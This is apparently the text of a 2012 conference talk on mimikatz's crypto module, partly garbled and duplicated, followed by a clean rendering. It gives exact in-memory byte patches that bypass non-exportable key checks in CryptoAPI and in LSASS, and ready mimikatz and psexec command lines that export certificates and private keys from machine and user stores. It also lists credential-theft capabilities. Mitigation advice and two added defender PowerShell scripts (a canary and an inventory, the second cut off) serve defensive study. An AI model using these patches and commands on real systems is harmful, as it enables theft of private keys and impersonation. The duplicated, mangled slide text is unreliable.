mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto / patch capi / because I own my process (slide 43)

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!

I wrote "4" bytes in my memory space:

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare

mimikatz crypto / patch capi / demo time (slide 44)

Import, export, import as not exportable… export!

mimikatz crypto / patch capi / limitations (slide 45)

Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little…

mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll

mimikatz crypto / cng / how it works (slide 46)

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…

mimikatz crypto / cng / how it's exported ( level) (slide 47)

[Diagram: a process asks CNG to export a key; the request goes over RPC to the KeyIso service inside the LSASS process (NT6 system protected process, ML_SYSTEM / SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP). KeyIso loads the private key (DPAPI decode, labelled "PLAYSKOOL" on the slide) and checks whether it is exportable: yes → exported key; no → NTE_NOT_SUPPORTED.]

mimikatz crypto / patch cng / because sometimes I own LSASS (slide 48)

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportKeys
[user] Clés CNG
    - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité   : NON
        Taille clé      : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
mod_cryptong::getPrivateKey ; PrivateKeyBlobToPVK (0x80090029) : L'opération demandée n'est pas prise en charge
[callout on the screenshot: Exportable]

mimikatz crypto / patch cng / because sometimes I own LSASS (slide 49)

This time checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

.text:6C815210 75 1C    jnz  short continue_key_export
.text:6C815210 EB 1C    jmp  short continue_key_export

mimikatz crypto / patch cng / demo time (slide 50)

Import, export, import as not exportable… export again!

mimikatz crypto / patch cng / limitations (slide 51)

Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algs than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…

mimikatz crypto / patch cng / bonus (slide 52)

After one admin patched LSASS, all users of the current system benefit from extra exports
– until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for export can work too
– Yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
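Slides 46 to 52 above describe the KeyIso export check (NTE_NOT_SUPPORTED, 0x80090029, for a key marked non-exportable) and what happens on a host where that check no longer holds inside LSASS: certutil and every other caller get non-exportable keys out until the KeyIso service restarts. The script below is an added example for defenders, written for this page and not code from the slides or from mimikatz. It creates a throwaway RSA key marked non-exportable in the Microsoft Software Key Storage Provider, asks the Key Isolation service to export the private part, and reports whether the expected 0x80090029 came back. The key container name is constructed; the script assumes Windows PowerShell 5.1 (.NET Framework 4.6 or later) or PowerShell 7 on Windows, and needs no special privilege because the canary is a user-scope key.

```powershell
# Added example, not from the slides: canary test of the CNG Key Isolation service.
# Creates a throwaway RSA key marked non-exportable in the Microsoft Software KSP, asks
# KeyIso (inside LSASS) to export the private part and expects NTE_NOT_SUPPORTED
# (0x80090029, the code shown in the mimikatz output above). If the export succeeds,
# the export policy is no longer enforced on this host.
# Assumes Windows PowerShell 5.1 (.NET Framework 4.6+) or PowerShell 7 on Windows.

$NTE_NOT_SUPPORTED = -2146893783   # 0x80090029 as a signed 32-bit HRESULT

function Test-CngExportPolicy {
    [CmdletBinding()]
    param(
        # Constructed, unique container name so the canary never collides with a real key
        [string]$KeyName = 'canary-noexport-' + [guid]::NewGuid().ToString('N')
    )

    $params = [System.Security.Cryptography.CngKeyCreationParameters]::new()
    $params.Provider     = [System.Security.Cryptography.CngProvider]::MicrosoftSoftwareKeyStorageProvider
    $params.ExportPolicy = [System.Security.Cryptography.CngExportPolicies]::None   # "Exportabilité : NON"
    $params.KeyUsage     = [System.Security.Cryptography.CngKeyUsages]::Signing
    $params.Parameters.Add([System.Security.Cryptography.CngProperty]::new(
        'Length', [System.BitConverter]::GetBytes([int]2048),
        [System.Security.Cryptography.CngPropertyOptions]::None))

    # A named key is persisted by the KSP: its private half lives in LSASS, not in this process.
    $key = [System.Security.Cryptography.CngKey]::Create(
        [System.Security.Cryptography.CngAlgorithm]::Rsa, $KeyName, $params)
    try {
        try {
            $blob = $key.Export([System.Security.Cryptography.CngKeyBlobFormat]::new('RSAPRIVATEBLOB'))
            # KeyIso handed out the private key despite the policy: the check was bypassed.
            return [pscustomobject]@{
                KeyName        = $KeyName
                PolicyEnforced = $false
                Detail         = "private blob of $($blob.Length) bytes returned"
            }
        } catch [System.Security.Cryptography.CryptographicException] {
            $ex = $_.Exception
            if ($ex.InnerException) { $ex = $ex.InnerException }   # unwrap PowerShell's MethodInvocationException
            return [pscustomobject]@{
                KeyName        = $KeyName
                PolicyEnforced = ($ex.HResult -eq $NTE_NOT_SUPPORTED)
                Detail         = ('0x{0:X8}: {1}' -f $ex.HResult, $ex.Message)
            }
        }
    } finally {
        $key.Delete()   # removes the canary from the KSP and releases the handle
    }
}

$result = Test-CngExportPolicy
$result | Format-List
if (-not $result.PolicyEnforced) {
    Write-Warning 'KeyIso exported a non-exportable private key: LSASS on this host is not enforcing the export policy.'
}
```

A host where PolicyEnforced comes back False while other hosts still answer 0x80090029 deserves a look at LSASS (in-memory code integrity, recent use of the debug privilege, unexpected handles to the process). Because slide 52 notes that a patched LSASS keeps behaving this way until reboot or a KeyIso restart, the check also works as a periodic scheduled task rather than a one-off.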
mimikatz crypto / memo (slide 53)

Some commands:
mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit

Password
– PFX files are protected by this password: mimikatz

Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it

mimikatz crypto / what we can do (slide 54)

Exactly the same as for sekurlsa – it will prevent access to accounts/computer: no admin, no admin, no admin…

Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM

More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
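Slides 45 and 54 together make the defensive point: keys handled by the rsaenh.dll CSPs are checked inside the calling process, keys in the Microsoft Software Key Storage Provider are checked inside LSASS, and only keys on a smart card, token, TPM or HSM are out of reach of both patches. The inventory script below is an added example, written for this page and not code from the slides or from mimikatz. For every certificate with a private key in the given stores it reports which API and provider holds the key and whether the key is flagged exportable, then counts the keys still sitting in a software provider. The provider list is constructed from the names on slide 45 plus the Software KSP; the script assumes Windows PowerShell 5.1 (.NET Framework 4.6.1 or later) or PowerShell 7 on Windows, and administrator rights to open LocalMachine keys.

```powershell
# Added example, not from the slides: inventory where the private keys behind a certificate
# store's certificates actually live. Keys in a software CSP (the rsaenh.dll based providers
# of slide 45) or in the Microsoft Software Key Storage Provider are the ones the in-process
# and LSASS patches reach; keys behind a smart card, TPM or HSM provider are what slide 54
# recommends. Assumes Windows PowerShell 5.1 (.NET Framework 4.6.1+) or PowerShell 7 on Windows.

# Constructed list of providers treated as "software"; extend it for your environment.
$SoftwareProviders = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
    'Microsoft Software Key Storage Provider'
)

function Get-PrivateKeyLocation {
    param(
        [Parameter(Mandatory)]
        [System.Security.Cryptography.X509Certificates.X509Certificate2]$Certificate
    )

    $info = [ordered]@{
        Subject    = $Certificate.Subject
        Thumbprint = $Certificate.Thumbprint
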